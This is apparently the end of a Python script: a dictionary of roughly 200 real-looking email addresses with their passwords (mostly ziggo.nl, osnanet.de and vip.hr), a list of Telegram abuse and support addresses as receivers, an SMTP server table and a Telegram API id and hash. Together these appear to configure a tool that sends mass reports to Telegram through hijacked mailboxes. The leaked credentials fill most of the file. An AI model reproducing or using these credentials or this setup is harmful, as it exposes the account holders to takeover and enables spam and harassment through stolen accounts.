'tleblansch@ziggo.nl':'noekie9797',
'selena00@ziggo.nl':'selena',
'docsie@osnanet.de':'Xerxes',
'p.wieland@ziggo.nl':'wa88nd',
'thomhuisman@ziggo.nl':'klooster13',
'abazuin@ziggo.nl':'bata2208',
'lctressel@ziggo.nl':'Zoetermeer11',
'kool72@ziggo.nl':'Bullepinkie-1',
'sbhola@ziggo.nl':'welkom01',
'paulieniping@ziggo.nl':'my1friend',
'e.vandervelde@ziggo.nl':'timeflyes',
'david-claudia@ziggo.nl':'1042ac',
'jelly-ann@ziggo.nl':'Samuel-12',
'andy.houben@ziggo.nl':'Av2hfpwt',
'ronaldscholten72@ziggo.nl':'bella72',
'mlkampschuur@ziggo.nl':'maxime13',
'peter_ober@ziggo.nl':'PO53HLV2',
'michellewagenvoort@ziggo.nl':'14071982',
'e.wouwenaar@ziggo.nl':'Wouwenaar1965',
'fam.hultsch@osnanet.de':'leoni3',
'hennesverspaget@ziggo.nl':'Hennes13',
'brigittepeeters@ziggo.nl':'brigitte22',
'ruediger.knuth@osnanet.de':'O25925O3',
'whonebecke@ziggo.nl':'welkom01',
'elzingadoze@ziggo.nl':'jolanda1',
'gerardeliens@ziggo.nl':'Gerard01',
'maikelvdwater@ziggo.nl':'Theleipo!91',
'o.oosterveld@ziggo.nl':'welkom123',
'jesperevers@ziggo.nl':'jepsadin',
'ligtenberg.j@ziggo.nl':'welkom.01',
'xbekkie30@ziggo.nl':'Rosco1',
'robin.scheper@ziggo.nl':'gjk6Geue17',
'b.schlee@ziggo.nl':'Skindo36',
'mvham@ziggo.nl':'martin45',
'e.kolsteeg@ziggo.nl':'Euro2008',
'logjes@ziggo.nl':'tuttebel',
'petervlek@ziggo.nl':'welkom01',
'imanbakker@ziggo.nl':'gofus10n',
'petra1981@ziggo.nl':'Petra1981',
'choogwerf@ziggo.nl':'utrecht2',
'jessiedebooij@ziggo.nl':'jdbne24',
'oving@ziggo.nl':'oving1',
'rmvanheiningen@ziggo.nl':'1hondjeQ',
'mapado@ziggo.nl':'Ar15Ak47',
'corsel@ziggo.nl':'welkom01',
'ddenis81@osnanet.de':'120881',
'lau.mijnders@ziggo.nl':'LARIS1TE',
'rene.visser@ziggo.nl':'Id984269',
'amany@ziggo.nl':'welkom01',
'justinvandeleur@ziggo.nl':'Gomes001',
'pmjsomers@ziggo.nl':'Pjotr123',
'sjsmits@ziggo.nl':'Stevens1',
'jactol@ziggo.nl':'i5pW5Grc',
'e.djansen@ziggo.nl':'R1kacoad!',
'jvelner@ziggo.nl':'Jv151169',
'semenova@ziggo.nl':'welkom01',
'xxklara11@vip.hr':'safari11',
'angel-anny@osnanet.de':'friends',
'pbangma@ziggo.nl':'Osiris28',
'weerd.dekei@ziggo.nl':'welkom01',
'lscheung@ziggo.nl':'welkom',
'jeroen1alberts@ziggo.nl':'Dewiislief09062011',
'ingrid-felix@ziggo.nl':'Welkom01',
'dietrich.enns@osnanet.de':'30041972',
'oudenes@ziggo.nl':'zeldzaam',
'vosjo@ziggo.nl':'banket43',
'd.j.molenaar@ziggo.nl':'Sjaak_1980',
'hassan1@ziggo.nl':'123456',
'rlwmulkens@ziggo.nl':'Mulkens1',
'j.wijnand@ziggo.nl':'Wijnand12!',
'margriet.brouwer@ziggo.nl':'34533453',
'hjellema@ziggo.nl':'LS87i3',
'enschede@ziggo.nl':'twente123',
'maikel.smit@ziggo.nl':'welkom01.',
'gp.breed@ziggo.nl':'Gerard1952',
'l.begas@ziggo.nl':'refugee3',
'jwblanksma@ziggo.nl':'joop2706',
'kacper@ziggo.nl':'shotshot',
'w.sevenstern@ziggo.nl':'Poppie32',
'rjrlindeman@ziggo.nl':'rjrl1976',
'maartenvansoest@ziggo.nl':'Gateway1',
'geertschepers.nl@ziggo.nl':'Geert.01',
'hutjeopdehei12@ziggo.nl':'trutje01',
'rolfdoedens@ziggo.nl':'klmn118092',
'rtbokum@ziggo.nl':'Velsatis01',
'barsik32@ziggo.nl':'shiva-1',
'janina.hegmanns2@osnanet.de':'9BwcxXeC',
'fransjoosen@ziggo.nl':'Joosen1949.',
'margriet.dijkshoorn@ziggo.nl':'Margriet01',
's.buhr@osnanet.de':'yebyzmtH1',
'a.roemers@ziggo.nl':'welkom01',
'humphrey@ziggo.nl':'welkom01',
'a.de.haan2@ziggo.nl':'harlingen2',
'abruinsma@ziggo.nl':'welkom01',
'keijser.w@ziggo.nl':'maikel1994',
'fokkejansma@ziggo.nl':'pontiac1',
'sylviayellowlunarsun@ziggo.nl':'Sjs27027',
'kerstin.oliver.jocksch@osnanet.de':'kinder4',
'memager@ziggo.nl':'Mager1',
'anton.versteeg@ziggo.nl':'Patroon-1',
'p.brolato@ziggo.nl':'welkom',
'vlinder124@ziggo.nl':'Hovawart01',
'niels.v.klaveren@ziggo.nl':'klerekast24',
'c.wonderwater@ziggo.nl':'1nouja',
'j.vdkooi@ziggo.nl':'jeroen01',
'wil.terreehorst@ziggo.nl':'corvette1',
'jeannevandeven@ziggo.nl':'Jeanne1940',
'leogerlag@ziggo.nl':'timmie51',
'jw-jansen@ziggo.nl':'welkom123',
'nanda.horn@ziggo.nl':'Stallen2008',
'wjvandenderen@ziggo.nl':'welkom',
'gerbenpannen@ziggo.nl':'gbvg41',
'allthatjazz@ziggo.nl':'jazzmenow',
'wimeelsing@ziggo.nl':'Pvmlkd37',
'timbomers@ziggo.nl':'53451984',
'h-nieman@ziggo.nl':'Hendrik1',
'amarinsdoevendans@ziggo.nl':'whucwlf4',
'wout.haf@ziggo.nl':'loeloe123',
'ibogers@ziggo.nl':'Aardvarken21!',
'tenpas@ziggo.nl':'ij9ndr5X',
'ahovenkamp@ziggo.nl':'lesbos2010',
'viola.huelse@osnanet.de':'huelse',
'funjet@ziggo.nl':'Funjet123',
's.boomsma@ziggo.nl':'Gs30533053.',
'fredhartman@ziggo.nl':'fred1965',
'dstruiksma@ziggo.nl':'welkom01',
'kloeckwibo@ziggo.nl':'Martine-77',
'jamhommes@ziggo.nl':'Phily001',
'mantelpieter@ziggo.nl':'Hakketak01',
'jgwestenberg@ziggo.nl':'Vuurtoren53',
'g.beusekom3@ziggo.nl':'Yoy90299',
'peter.schielen@ziggo.nl':'uh38ub',
'p_visser@ziggo.nl':'welkom01',
'sharlove@ziggo.nl':'10031986',
'wangosl@ziggo.nl':'mansaray123',
'margie1964@ziggo.nl':'Margie1964!',
'sufridor_vvc@ziggo.nl':'Sufridor1982',
'van.bavel@ziggo.nl':'Sasja2001!',
'kuenen76@ziggo.nl':'cypress1',
'gwkoerts@ziggo.nl':'Nootdweer',
'f.v.empel@ziggo.nl':'frank1',
'w-brands@ziggo.nl':'3513brands',
'swfurster@ziggo.nl':'beertje256',
'basdenijs@ziggo.nl':'Basdenijs1',
'j-leijtnes@ziggo.nl':'welkom01',
'jatdc@ziggo.nl':'Freespace2',
'juliavantongeren@ziggo.nl':'Juultje123',
'tessa.houtzager@ziggo.nl':'Tessa1',
'emma.herber@osnanet.de':'peter50',
'andreas_hagedorn@osnanet.de':'Grafzahl70',
'cici2904@osnanet.de':'2023ro',
'weith@osnanet.de':'Gaertnerei',
'kissgirl@osnanet.de':'schnuffi1710',
'rene.osterbrink@osnanet.de':'kocham',
'michael.brown@osnanet.de':'32Vgh902',
'marc.livermore@osnanet.de':'129896114',
'katharina.schulz@osnanet.de':'rosa1999',
'maik-peters@osnanet.de':'snoopy',
'mightybat@vip.hr':'batmaN1808',
'pierre.kemna@osnanet.de':'osnapower',
'hansjoerg.kasselmann@osnanet.de':'Lirunda',
'tomica05@vip.hr':'LUCIJA0505',
'tsimun@vip.hr':'marina1010',
'davidjan@ziggo.nl':'Davidjan1',
'paul.woldendorp@ziggo.nl':'Alexander1',
'mareijn.willems@ziggo.nl':'welkom',
'mwalison@ziggo.nl':'Wachtwoord',
'clemente@osnanet.de':'2-kinder',
'daniel.kasper@osnanet.de':'am3l13',
'andrea.heilmann-menzel@osnanet.de':'ninoah',
'dominik.stein@osnanet.de':'240994',
'wsw.rheine@osnanet.de':'waldemar1',
'hartmut.buescher@osnanet.de':'drillinge',
'mbister@vip.hr':'rolex69',
'stefan.schubert@osnanet.de':'chausson',
'jaceluni@osnanet.de':'luca10',
'kurt.reffeld@osnanet.de':'BMNnQS',
'n.arlavi@vip.hr':'0607979',
'jensis@osnanet.de':'28061979',
'leandra@osnanet.de':'kasimir',
'schnati92@osnanet.de':'240292',

}

receivers = [
    'sms@telegram.org', 'dmca@telegram.org', 'abuse@telegram.org', 
    'sticker@telegram.org', 'support@telegram.org', 'security@telegram.org', 
    'recover@telegram.org', 
]

smtp_servers = {
                "gmail.com": ("smtp.gmail.com", 587),
                "ziggo.nl": ("smtp.ziggo.nl", 587),
                "yandex.ru": ("smtp.yandex.ru", 587),
                "mail.ru": ("smtp.mail.ru", 587),
                "rambler.ru": ("smtp.rambler.ru", 587),
                "outlook.com":("smtp.office365.com", 587),
                "uhserver.com":("smtps.uhserver.com", 587),
                "vip.hr":("mail.vip.hr", 587),
                "mchsi.com":("smtp.mchsi.com", 587),
                "hotmail.com" : ("smtp.office365.com", 587),
                "live.com" : ("smtp.office365.com", 587),
                "yahoo.com" : ("smtp.mail.yahoo.com", 587),
                "aol.com" : ("smtp.aol.com", 587),
                "icloud.com" : ("smtp.mail.me.com", 587),
                "zoho.com" : ("smtp.zoho.com", 587),
                "fastmail.com" : ("smtp.fastmail.com", 587),
                "gmx.com" : ("smtp.gmx.com", 587),
                "bol.com.br" : ("smtp.bol.com.br", 587),
                "terra.com.br" : ("smtp.terra.com.br", 587),
                "free.fr" : ("smtp.free.fr", 587),
                "laposte.net" : ("smtp.laposte.net", 587),
                "btinternet.com" : ("mail.btinternet.com", 587),
                "btconnect.com" : ("mail.btinternet.com", 587),
                "qq.com" : ("smtp.qq.com", 587),
                "163.com" : ("smtp.163.com", 587),            
                "126.com" : ("smtp.126.com", 587),
                "sina.com" : ("smtp.sina.com", 587),
                "terra.com.mx" : ("smtp.terra.com.mx", 587),
                "sendgrid.net" : ("smtp.sendgrid.net", 587),
                "mailgun.org" : ("smtp.mailgun.org", 587),
                "postmarkapp.com" : ("smtp.postmarkapp.com", 587),
                "smtp.elasticemail.com" : ("smtp.elasticemail.com", 587),
                "mchsi.com" : ("smtp.mchsi.com", 587),
                "rambler.r" : ("smtp.rambler.ru", 587),
                "protonmail.com": ("mail.protonmail.com", 587),
                "proton.me": ("mail.protonmail.com", 587),
                "yandex.com": ("smtp.yandex.com", 587),
                "yandex.ua": ("smtp.yandex.ru", 587),
                "yandex.kz": ("smtp.yandex.ru", 587),
                "yahoo.co.uk": ("smtp.mail.yahoo.com", 587),
                "yahoo.de": ("smtp.mail.yahoo.com", 587),
                "ymail.com": ("smtp.mail.yahoo.com", 587),
                "rocketmail.com": ("smtp.mail.yahoo.com", 587),
                "seznam.cz": ("smtp.seznam.cz", 587),
                "wp.pl": ("smtp.wp.pl", 587),
                "o2.pl": ("poczta.o2.pl", 587),
                "orange.fr": ("smtp.orange.fr", 587),
                "sfr.fr": ("smtp.sfr.fr", 587),
                "wanadoo.fr": ("smtp.wanadoo.fr", 587),
                "web.de": ("smtp.web.de", 587),
                "gmx.net": ("smtp.gmx.net", 587),
                "gmx.de": ("smtp.gmx.de", 587),
                "mail.com": ("smtp.mail.com", 587),
                "libero.it": ("smtp.libero.it", 587),
                "alice.it": ("smtp.alice.it", 587),
                "virgilio.it": ("smtp.virgilio.it", 587),
                "naver.com": ("smtp.naver.com", 587),
                "daum.net": ("smtp.daum.net", 587),
                "nate.com": ("smtp.nate.com", 587),
                "hanmail.net": ("smtp.hanmail.net", 587),
                "5x2.de":("smtp.5x2.de", 587),
                "osnanet.de": ("smtp.osnanet.de", 587),
                "task.com.br": ("smtp.task.com.br", 587),
                "singnet.com": ("mail.singnet.com.sg", 25),
                "lds.net.ua": ("mail.lds.net.ua", 25),
                "montevideo.com.uy": ("mail.montevideo.com.uy", 25)
}

clients = [  
    {"name": "doom2", "api_id": 26898982, "api_hash": "1aff100a728735d53a0d9ce391fb9ed0"}
]